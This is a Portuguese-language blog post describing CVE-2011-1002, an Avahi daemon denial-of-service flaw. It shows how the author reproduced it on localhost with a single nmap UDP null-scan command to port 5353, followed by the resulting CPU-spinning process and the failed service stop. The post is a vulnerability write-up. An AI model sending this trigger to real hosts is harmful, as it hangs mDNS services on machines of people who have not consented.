CVE-2011-1002: Avahi Daemon Remote Denial of Service

Navegando por aí [1], acabei encontrando esse advisory: "CVE-2011-1002: Avahi Daemon Remote Denial of Service", procurei por detalhes e logo achei um texto a respeito, colocando até um link para um patch [2].

A descrição do CVE-2011-1002 é a seguinte:

avahi-core/socket.c in avahi-daemon in Avahi before 0.6.29 allows remote attackers to cause a denial of service (infinite loop) via an empty (1) IPv4 or (2) IPv6 UDP packet to port 5353. NOTE: this vulnerability exists because of an incorrect fix for CVE-2010-2244.

Para quem está curioso para testar esse bug localmente, é bem simples, basta enviar um pacote UDP NULL pro daemon do Avahi (porta 5353).

Resolvi então testar com o nmap:

nmap -sU -sN localhost -p5353
 
Starting Nmap 4.62 ( http://nmap.org ) at 2011-02-26 23:36 BRT
Interesting ports on localhost (127.0.0.1):
PORT     STATE         SERVICE
5353/tcp closed        unknown
5353/udp open|filtered zeroconf
 
Nmap done: 1 IP address (1 host up) scanned in 0.299 seconds

E pronto! Bastou rodar um top para comprovar:

  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
 7634 avahi     20   0  2884 1444 1224 R  100  0.1   5:55.18 avahi-daemon

Tentando dar um stop, teremos o seguinte:

/etc/init.d/avahi-daemon stop
Stopping Avahi mDNS/DNS-SD Daemon: avahi-daemon
Failed to kill daemon: Timer expired
 (warning).

Então, a solução foi matar o processo.

[1] - https://bugzilla.redhat.com/show_bug.cgi?id=667187
[2] - http://xorl.wordpress.com/2011/02/20/cve-2011-1002-avahi-daemon-remote-d...

Exploit pra que né, nmap

Exploit pra que né, nmap ftw XD

Comment viewing options

Select your preferred way to display the comments and click "Save settings" to activate your changes.

Post new comment

The content of this field is kept private and will not be shown publicly.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Allowed HTML tags: <a> <em> <strong> <cite> <code> <ul> <ol> <li> <dl> <dt> <dd>
  • Lines and paragraphs break automatically.

More information about formatting options